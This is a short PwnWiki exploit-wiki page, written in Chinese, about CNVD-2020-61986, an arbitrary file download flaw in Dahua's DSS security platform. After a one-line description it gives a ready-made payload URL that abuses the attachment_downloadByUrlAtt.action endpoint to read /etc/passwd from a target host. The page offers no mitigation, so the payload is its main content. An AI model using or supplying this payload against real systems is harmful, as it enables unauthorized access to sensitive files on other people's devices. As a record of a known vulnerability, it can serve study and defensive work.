CNVD-2020-61986 大華DSS系統任意文件下載漏洞

From PwnWiki

Revision as of 20:44, 12 June 2021 by Pwnwiki (talk | contribs) (Marked this version for translation)

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Other languages:

Chinese • ‎中文（中国大陆）‎ • ‎中文（台灣）‎

漏洞簡介

浙江大華技術股份有限公司DSS存在任意文件下載漏洞，攻擊者可利用該漏洞登錄界面下載任意文件獲取敏感信息。

Payload

http://ip/itc/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd

Retrieved from "https://pwnwiki.com/index.php?title=CNVD-2020-61986_大華DSS系統任意文件下載漏洞&oldid=4894"